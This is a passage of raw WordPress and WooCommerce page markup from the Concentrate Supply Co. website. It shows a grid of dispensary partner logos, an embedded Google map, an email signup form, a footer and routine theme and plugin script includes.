style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/08/pig_n_whistle_alt_green_400-1-450x450.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-24 slide-parity-even av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/08/HS-iVD7y-450x450.jpg);'></span></div></div><div class='slide-entry-wrap' ><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-25 slide-parity-odd av_one_eighth first real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/08/ls.jpg);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-26 slide-parity-even av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/08/rmcannabismaster_1.jpg);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-27 slide-parity-odd av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/08/large_CannaMedsLogo-450x450.jpg);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-28 slide-parity-even av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/08/large_THC_WeedmapsAssets_6-3-17_Avatar-MED-450x450.jpg);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-29 slide-parity-odd av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/08/verts-450x450.jpg);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-30 slide-parity-even av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/08/Unknown.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-31 slide-parity-odd av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/08/Screen-Shot-2017-09-07-at-11.31.45-PM-450x450.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-32 slide-parity-even av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/08/Screen-Shot-2017-09-07-at-11.29.09-PM-450x450.png);'></span></div></div><div class='slide-entry-wrap' ><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-33 slide-parity-odd av_one_eighth first real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/08/Screen-Shot-2017-09-07-at-11.34.52-PM-450x450.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-34 slide-parity-even av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/09/universalherbs250-01-300x300-300x300.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-35 slide-parity-odd av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/08/high-west-cannabis-transparent-1-450x450.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-36 slide-parity-even av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/09/Tru_1-300x250.jpg);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-37 slide-parity-odd av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2018/04/Rooted-logo-1-450x450.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-38 slide-parity-even av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/09/stash-house-2-450x450.jpg);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-39 slide-parity-odd av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/09/Screen-Shot-2017-09-10-at-6.25.52-PM-450x450.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-40 slide-parity-even av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2018/04/TheJointbyCannabis-CSC.png);'></span></div></div><div class='slide-entry-wrap' ><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-41 slide-parity-odd av_one_eighth first real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/09/solacelogo-450x450.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-42 slide-parity-even av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/09/Screen-Shot-2017-09-10-at-6.29.01-PM.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-43 slide-parity-odd av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/09/Screen-Shot-2017-09-10-at-6.24.02-PM-450x450.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-44 slide-parity-even av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/09/Screen-Shot-2017-09-10-at-6.21.04-PM-450x450.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-45 slide-parity-odd av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/09/Helping_Hands_Boulder_Dispensary_Logo-450x450.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-46 slide-parity-even av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/09/large_logo-450x450.jpg);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-47 slide-parity-odd av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/09/LifeFlowerLogo-10-20-16-450x450.jpg);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-48 slide-parity-even av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/09/large_PURE_LOGO_280-450x450.jpg);'></span></div></div><div class='slide-entry-wrap' ><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-49 slide-parity-odd av_one_eighth first real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/09/mile-high-dispensary-logo-450x450.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-50 slide-parity-even av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/09/nslogo-450x450.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-51 slide-parity-odd av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/09/2810-450x450.jpg);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-52 slide-parity-even av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/09/download.jpeg);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-53 slide-parity-odd av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/09/6ff2cabb9d9de25297051214d6a8d4ba-medical-marijuana-cannabis.jpg);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-54 slide-parity-even av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/09/Affinity-Dispensary-Logo-3_1466817363-450x450.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-55 slide-parity-odd av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/09/4naUJlTY_400x400.jpg);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-56 slide-parity-even av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/09/2xlogo-450x450.png);'></span></div></div><div class='slide-entry-wrap' ><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-57 slide-parity-odd av_one_eighth first real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/08/Screen-Shot-2017-10-01-at-6.58.23-PM-450x450.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-58 slide-parity-even av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/08/Screen-Shot-2017-10-01-at-6.57.32-PM-450x450.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-59 slide-parity-odd av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/08/Screen-Shot-2017-10-01-at-6.57.39-PM-450x450.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-60 slide-parity-even av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/08/Screen-Shot-2017-10-01-at-6.58.35-PM-450x450.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-61 slide-parity-odd av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/08/Screen-Shot-2017-10-01-at-6.58.00-PM-450x450.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-62 slide-parity-even av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/11/Screen-Shot-2017-11-29-at-11.07.15-AM-450x450.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-63 slide-parity-odd av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/11/Screen-Shot-2017-11-29-at-11.04.34-AM-450x418.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-64 slide-parity-even av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2018/06/Botanico-Denver.jpeg);'></span></div></div><div class='slide-entry-wrap' ><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-65 slide-parity-odd av_one_eighth first real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2018/07/headquarters.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-66 slide-parity-even av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/08/Screen-Shot-2017-11-14-at-9.10.01-AM-450x450.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-67 slide-parity-odd av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2018/07/kindlove-450x450.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-68 slide-parity-even av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2018/07/lacontes-450x450.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-69 slide-parity-odd av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2018/07/natureskiss-450x450.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-70 slide-parity-even av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2018/07/MainStreetCannabis-Logo.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-71 slide-parity-odd av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2018/07/DrReleaf-450x450.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-72 slide-parity-even av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2018/08/frostedleaf_sticker-450x450.jpg);'></span></div></div><div class='slide-entry-wrap' ><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-73 slide-parity-odd av_one_eighth first real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2017/08/large_Standing_Akimbo-Logo_RGB-450x450.jpg);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-74 slide-parity-even av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2018/11/chronic-therapy-logo-450x450.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-75 slide-parity-odd av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2019/01/HighlandHealthLogo-CSC-450x450.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-76 slide-parity-even av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2019/03/Allgreens-CSC-logo.jpg);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-77 slide-parity-odd av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2019/03/CCC_logo_CSC-450x450.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-78 slide-parity-even av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2019/03/Screen-Shot-2019-03-11-at-4.15.31-PM-450x450.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-79 slide-parity-odd av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2019/03/GreenHeartCannabis-CSC-logo-450x450.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-80 slide-parity-even av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2019/03/Peaceful-Choice-CSC-logo.png);'></span></div></div><div class='slide-entry-wrap' ><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-81 slide-parity-odd av_one_eighth first real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2019/03/BestDayEver-CSC-logo.jpg);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-82 slide-parity-even av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2019/04/goldenleaf-logo-csc-450x450.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-83 slide-parity-odd av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2019/04/LittleGreenPharmacy-logo-dosd-450x450.png);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-84 slide-parity-even av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2019/04/redeyereleaf-logo-dosd.jpeg);'></span></div><div class='slide-entry flex_column no_margin post-entry slide-entry-overview slide-loop-85 slide-parity-odd post-entry-last av_one_eighth real-thumbnail'><span class='av-partner-fake-img' style='padding-bottom:100%; background-image:url(https://concentratesupplyco.com/wp-content/uploads/2019/04/apotheke-csc-logo.png);'></span></div></div></div></div> <section class="avia_codeblock_section avia_code_block_0" itemscope="itemscope" itemtype="https://schema.org/CreativeWork" ><div class='avia_codeblock ' itemprop="text" > <div style="height:400px; width:100%; display:inline-block; overflow:hidden;"> <iframe style="position:relative; top:-50px; border:none;" src="https://www.google.com/maps/d/embed?mid=12DR6xw9MaEaUzq-zMB1OxS2aRy67XpPc&hl=en" width="100%" height="445"></iframe> </div> </div></section> </div></div></div><!-- close content main div --></div></div><div id='av-layout-grid-5' class='av-layout-grid-container entry-content-wrapper main_color av-flex-cells avia-builder-el-69 el_after_av_codeblock el_before_av_section submenu-not-first container_wrap fullsize' style=' ' > <div class="flex_cell no_margin av_one_third avia-builder-el-70 el_before_av_cell_one_third avia-builder-el-first av-zero-padding av-hide-on-mobile " style='height:10px; min-height:10px;vertical-align:middle; padding:0px; background-color:#f9bd22; '><div class='flex_cell_inner' > </div></div><div class="flex_cell no_margin av_one_third avia-builder-el-71 el_after_av_cell_one_third el_before_av_cell_one_third av-zero-padding " style='height:10px; min-height:10px;vertical-align:top; padding:0px; background-color:#f9e125; '><div class='flex_cell_inner' > </div></div><div class="flex_cell no_margin av_one_third avia-builder-el-72 el_after_av_cell_one_third avia-builder-el-last av-zero-padding " style='height:10px; min-height:10px;vertical-align:top; padding:0px; background-color:#f2cc24; '><div class='flex_cell_inner' > </div></div> </div> <div id='av_section_5' class='avia-section main_color avia-section-default avia-no-border-styling avia-bg-style-scroll avia-builder-el-73 el_after_av_layout_row avia-builder-el-last av-minimum-height av-minimum-height-25 container_wrap fullsize' style='background-color: #0a0a0a; ' data-av_minimum_height_pc='25'><div class='container' ><div class='template-page content av-content-full alpha units'><div class='post-entry post-entry-type-page post-entry-25'><div class='entry-content-wrapper clearfix'> <div class="flex_column av_one_third flex_column_div av-zero-column-padding first avia-builder-el-74 el_before_av_one_third avia-builder-el-first " style='border-radius:0px; '></div><div class="flex_column av_one_third flex_column_div av-zero-column-padding avia-builder-el-75 el_after_av_one_third el_before_av_one_third " style='border-radius:0px; '><div style='padding-bottom:10px; font-size:50px;' class='av-special-heading av-special-heading-h2 blockquote modern-quote modern-centered avia-builder-el-76 el_before_av_contact avia-builder-el-first av-inherit-size '><h2 class='av-special-heading-tag ' itemprop="headline" >Subscribe</h2><div class ='av-subheading av-subheading_below ' style='font-size:12px;'><p>Enter your email address to stay up to date!</p> </div><div class='special-heading-border'><div class='special-heading-inner-border' ></div></div></div> <form action="https://concentratesupplyco.com/" method="post" class="avia_ajax_form av-form-labels-hidden avia-builder-el-77 el_after_av_heading avia-builder-el-last av-centered-form " data-avia-form-id="1" data-avia-redirect=''><fieldset><p class=' first_form form_element form_fullwidth av-last-visible-form-element' id='element_avia_1_1'> <input name="avia_1_1" class="text_input is_email" type="text" id="avia_1_1" value="" placeholder='E-Mail*'/></p><p class="hidden"><input type="text" name="avia_2_1" class="hidden " id="avia_2_1" value="" /></p><p class="form_element "><input type="hidden" value="1" name="avia_generated_form1" /><input type="submit" value="SIGN UP" class="button" data-sending-label="Sending"/></p></fieldset></form><div id="ajaxresponse_1" class="ajaxresponse ajaxresponse_1 hidden"></div></div><div class="flex_column av_one_third flex_column_div av-zero-column-padding avia-builder-el-78 el_after_av_one_third avia-builder-el-last " style='border-radius:0px; '></div> </div></div></div><!-- close content main div --> <!-- section close by builder template --> </div><!--end builder template--></div><!-- close default .container_wrap element --> <div class='container_wrap footer_color' id='footer'> <div class='container'> </div> <!-- ####### END FOOTER CONTAINER ####### --> </div> <footer class='container_wrap socket_color' id='socket' role="contentinfo" itemscope="itemscope" itemtype="https://schema.org/WPFooter" > <div class='container'> <span class='copyright'>© Copyright - Concentrate Supply Co.™ | Design by Kyle Williams </span> </div> <!-- ####### END SOCKET CONTAINER ####### --> </footer> <!-- end main --> </div> <!-- end wrap_all --></div> <a href='#top' title='Scroll to top' id='scroll-top-link' aria-hidden='true' data-av_icon='' data-av_iconfont='entypo-fontello'><span class="avia_hidden_link_text">Scroll to top</span></a> <div id="fb-root"></div> <script type='text/javascript'> /* <![CDATA[ */ var avia_framework_globals = avia_framework_globals || {}; avia_framework_globals.frameworkUrl = 'https://concentratesupplyco.com/wp-content/themes/enfold/framework/'; avia_framework_globals.installedAt = 'https://concentratesupplyco.com/wp-content/themes/enfold/'; avia_framework_globals.ajaxurl = 'https://concentratesupplyco.com/wp-admin/admin-ajax.php'; /* ]]> */ </script> <style type='text/css'> @media only screen and (min-width: 768px) and (max-width: 989px) { .responsive #top #wrap_all .av-medium-font-size-30{font-size:30px !important;} .responsive #top #wrap_all .av-medium-font-size-40{font-size:40px !important;} } @media only screen and (min-width: 480px) and (max-width: 767px) { .responsive #top #wrap_all .av-small-font-size-30{font-size:30px !important;} .responsive #top #wrap_all .av-small-font-size-34{font-size:34px !important;} } @media only screen and (max-width: 479px) { .responsive #top #wrap_all .av-mini-font-size-40{font-size:40px !important;} } </style> <script type="text/javascript"> var c = document.body.className; c = c.replace(/woocommerce-no-js/, 'woocommerce-js'); document.body.className = c; </script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-content/themes/enfold/config-woocommerce/woocommerce-mod.js?ver=1'></script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-content/themes/enfold/js/avia.js?ver=4.5.7'></script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-content/themes/enfold/js/shortcodes.js?ver=4.5.7'></script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/audio-player/audio-player.js?ver=5.2'></script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/contact/contact.js?ver=5.2'></script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow/slideshow.js?ver=5.2'></script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/countdown/countdown.js?ver=5.2'></script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/gallery/gallery.js?ver=5.2'></script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/gallery_horizontal/gallery_horizontal.js?ver=5.2'></script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/headline_rotator/headline_rotator.js?ver=5.2'></script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/icongrid/icongrid.js?ver=5.2'></script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/iconlist/iconlist.js?ver=5.2'></script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/image_hotspots/image_hotspots.js?ver=5.2'></script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/magazine/magazine.js?ver=5.2'></script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/portfolio/isotope.js?ver=5.2'></script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/masonry_entries/masonry_entries.js?ver=5.2'></script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/menu/menu.js?ver=5.2'></script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/notification/notification.js?ver=5.2'></script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/numbers/numbers.js?ver=5.2'></script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/portfolio/portfolio.js?ver=5.2'></script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/progressbar/progressbar.js?ver=5.2'></script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow/slideshow-video.js?ver=5.2'></script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_accordion/slideshow_accordion.js?ver=5.2'></script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_fullscreen/slideshow_fullscreen.js?ver=5.2'></script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_layerslider/slideshow_layerslider.js?ver=5.2'></script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/tab_section/tab_section.js?ver=5.2'></script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/tabs/tabs.js?ver=5.2'></script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/testimonials/testimonials.js?ver=5.2'></script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/timeline/timeline.js?ver=5.2'></script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/toggles/toggles.js?ver=5.2'></script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/video/video.js?ver=5.2'></script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.70'></script> <script type='text/javascript'> /* <![CDATA[ */ var wc_add_to_cart_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","i18n_view_cart":"View cart","cart_url":"https:\/\/concentratesupplyco.com\/cart\/","is_cart":"","cart_redirect_after_add":"no"}; /* ]]> */ </script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=3.6.2'></script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4'></script> <script type='text/javascript'> /* <![CDATA[ */ var woocommerce_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%"}; /* ]]> */ </script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=3.6.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var wc_cart_fragments_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","cart_hash_key":"wc_cart_hash_ac360f4351c383ffad4fd7baa472cbe1","fragment_name":"wc_fragments_ac360f4351c383ffad4fd7baa472cbe1","request_timeout":"5000"}; /* ]]> */ </script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=3.6.2'></script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-content/themes/enfold/js/aviapopup/jquery.magnific-popup.min.js?ver=4.5.7'></script> <script type='text/javascript' 